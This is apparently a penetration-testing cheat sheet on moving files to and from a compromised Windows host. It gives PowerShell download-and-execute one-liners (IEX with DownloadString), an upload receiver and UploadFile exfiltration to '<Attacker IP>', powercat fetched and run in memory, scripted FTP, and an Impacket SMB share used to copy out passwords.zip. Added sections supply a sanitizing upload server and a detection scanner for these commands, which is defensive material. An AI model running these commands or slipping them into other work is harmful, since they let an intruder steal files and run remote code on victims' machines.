
File Transfer

Powershell

Download file

For this example, first start a web server on the attacker side. To do so, run the following command in the directory containing the file(s) to be downloaded:

python3 -m http.server 80

Saving to disk

(new-object System.Net.WebClient).DownloadFile('http://<Attacker IP>/wget.exe','C:\Users\<user>\Desktop\wget.exe')

Without writing to disk (the fetched content is executed as PowerShell script text in memory, so the URL must point at a script, not a compiled executable)

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<Attacker IP>/<script>.ps1')

Upload file

First, start a PHP-capable web server (Apache or nginx with PHP) on the attacker machine. Then, create an upload.php file on this web server:

<?php
// Directory that receives uploads; must be writable by the web server user.
$uploaddir = '/var/www/uploads/';
// Keep only the file name component so a crafted name cannot write outside $uploaddir.
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
// Move the temporary upload into place.
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>

Do not forget to create a dedicated directory for uploaded files, owned by the web server user:

sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads

Finally, on the Windows host from which you want to upload a file, invoke the UploadFile method:

C:\Users\victim> powershell (New-Object System.Net.WebClient).UploadFile('http://<Attacker IP>/upload.php', 'important.docx')
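The upload.php above is the page's own receiver. As an added example (not from the original page), here is an equivalent receiver in Python that accepts the same UploadFile call on top of the python3 http.server the page already uses. It sanitizes the client-supplied filename (upload.php writes $_FILES['file']['name'] as received) and records a SHA-256 of every stored file so the transfer can be verified end to end. UPLOAD_DIR, LISTEN_PORT and the helper names are assumptions for this example.

```python
"""Added example: HTTP multipart upload receiver with filename sanitization
and SHA-256 logging. Not code from the original page."""
import hashlib
import os
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical defaults; adjust to your own lab layout.
UPLOAD_DIR = "/var/www/uploads"
LISTEN_PORT = 80


def safe_filename(name: str) -> str:
    """Keep only the final path component so '../x' or 'C:\\x' cannot escape UPLOAD_DIR."""
    base = os.path.basename(name.replace("\\", "/"))
    return base or "unnamed.bin"


def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Minimal multipart/form-data parser: returns [(filename, content), ...]
    for every part that carries a filename= parameter."""
    delimiter = b"--" + boundary
    files = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):        # CRLF that follows the delimiter
            chunk = chunk[2:]
        head, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):        # CRLF that precedes the next delimiter
            content = content[:-2]
        m = re.search(rb'filename="([^"]*)"', head)
        if m:
            files.append((m.group(1).decode("utf-8", "replace"), content))
    return files


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def store_uploads(body: bytes, boundary: bytes, dest_dir: str) -> list:
    """Write each uploaded file under dest_dir; return [(name, size, sha256), ...]."""
    results = []
    for raw_name, content in parse_multipart(body, boundary):
        name = safe_filename(raw_name)
        with open(os.path.join(dest_dir, name), "wb") as fh:
            fh.write(content)
        results.append((name, len(content), sha256_hex(content)))
    return results


class UploadHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        ctype = self.headers.get("Content-Type", "")
        m = re.search(r"boundary=([^;]+)", ctype)
        length = int(self.headers.get("Content-Length", "0"))
        if not m or length <= 0:
            self.send_error(400, "multipart/form-data with a boundary is required")
            return
        boundary = m.group(1).strip('"').encode()
        stored = store_uploads(self.rfile.read(length), boundary, UPLOAD_DIR)
        for name, size, digest in stored:
            self.log_message("stored %s (%d bytes) sha256=%s", name, size, digest)
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    os.makedirs(UPLOAD_DIR, exist_ok=True)
    HTTPServer(("0.0.0.0", LISTEN_PORT), UploadHandler).serve_forever()
```

Run it in place of the PHP receiver and point the same UploadFile call at `/` (any path is accepted); compare the logged SHA-256 with the hash of the source file on the Windows host to confirm the copy is intact.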

Powercat

Powercat is a PowerShell function that can establish remote shells, generate payloads, create network relays, or transfer files. It must be loaded into the session before it can be called.

If the machine has access to the Internet, you can download and load Powercat as follows:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Send local file

powercat -c <remote IP> -p <remote Port> -i <Input file path>

Receive remote file

powercat -l -p <local Port> -of <Output file path>

FTP

For both of the following examples, an FTP server must be started on the attacker machine.

Download file

From a Windows command prompt, execute the following instructions (note the space before `>` on the first line: in cmd, `21>` is parsed as a redirection of handle 1 and the port digit is lost):

C:\Users\victim> echo open <Attacker IP> 21 > ftp.txt
C:\Users\victim> echo USER <username> <password> >> ftp.txt
C:\Users\victim> echo binary >> ftp.txt
C:\Users\victim> echo GET <file> >> ftp.txt
C:\Users\victim> echo bye >> ftp.txt
C:\Users\victim> ftp -v -n -s:ftp.txt
C:\Users\victim> del ftp.txt

The previous operation can also be done as a one-liner:

C:\Users\victim> echo open <Attacker IP> 21 > ftp.txt & echo USER <username> <password> >> ftp.txt & echo binary >> ftp.txt & echo GET <file> >> ftp.txt & echo bye >> ftp.txt & ftp -n -v -s:ftp.txt & del ftp.txt

Upload file

To upload a file via FTP, the procedure is the same as for downloading: replace the GET command with PUT followed by the path of the local file to be uploaded.

SMB Share (via Impacket)

On the attacker machine, start an SMB server. It can be done via Impacket as follows:

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver share .
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Then, on the remote host, map this network share and copy local files to it.

C:\>net use * \\<Attacker IP>\share
Drive Z: is now connected to \\<Attacker IP>\share.

C:\>copy passwords.zip Z:\
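As an added defensive example (not part of the original page) that covers every technique described above, the following Python scans command-line or PowerShell ScriptBlock text for the transfer primitives this page uses: WebClient DownloadFile and UploadFile, IEX with DownloadString, powercat with -i/-of, scripted ftp -s:, and net use or copy to a UNC path. The rule names, the sample lines and the placeholder addresses are constructed for the demonstration.

```python
"""Added example: detection rules for the file-transfer primitives on this page,
run over constructed sample command lines. Not code from the original page."""
import re

# Each rule: (tag, compiled pattern). Patterns tolerate spacing and case
# because these commands are typically typed by hand.
RULES = [
    ("webclient-download-to-disk", re.compile(r"\bDownloadFile\s*\(", re.I)),
    ("in-memory-download-execute",
     re.compile(r"\b(IEX|Invoke-Expression)\b.*\bDownloadString\s*\(", re.I)),
    ("webclient-upload", re.compile(r"\bUploadFile\s*\(", re.I)),
    ("powercat-transfer", re.compile(r"\bpowercat\b.*\s-(i|of)\b", re.I)),
    ("scripted-ftp", re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
    ("unc-share-mapping", re.compile(r"\bnet\s+use\b.*\\\\", re.I)),
    ("copy-to-unc-share", re.compile(r"\b(copy|xcopy|robocopy)\b.*\\\\", re.I)),
]


def classify(line: str) -> list:
    """Return the tags of every rule that matches this command line."""
    return [tag for tag, pat in RULES if pat.search(line)]


def scan(lines) -> list:
    """Return (line_number, tag, line) for every hit, one entry per matching rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        for tag in classify(line):
            hits.append((n, tag, line.strip()))
    return hits


# Constructed sample telemetry (not real logs); 192.0.2.10 is a documentation address.
SAMPLE_LINES = [
    "powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/tool.ps1')",
    "(new-object System.Net.WebClient).DownloadFile('http://192.0.2.10/wget.exe','C:\\Users\\u\\Desktop\\wget.exe')",
    "powercat -c 192.0.2.10 -p 443 -i C:\\Users\\u\\secrets.zip",
    "ftp -v -n -s:ftp.txt",
    "net use * \\\\192.0.2.10\\share",
    "copy secrets.zip \\\\192.0.2.10\\share\\",
    "copy passwords.zip Z:\\",   # mapped drive: only the preceding net use fires
    "ping -n 1 192.0.2.10",       # benign, must not match
]

if __name__ == "__main__":
    for n, tag, line in scan(SAMPLE_LINES):
        print(f"line {n}: {tag}: {line}")
```

The copy to Z:\ deliberately produces no hit on its own: once a share is mapped to a drive letter, the copy looks like a local operation, so the net use event is the signal to key on and the subsequent copies are found by correlating on the same host and session.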

Last updated 2 years ago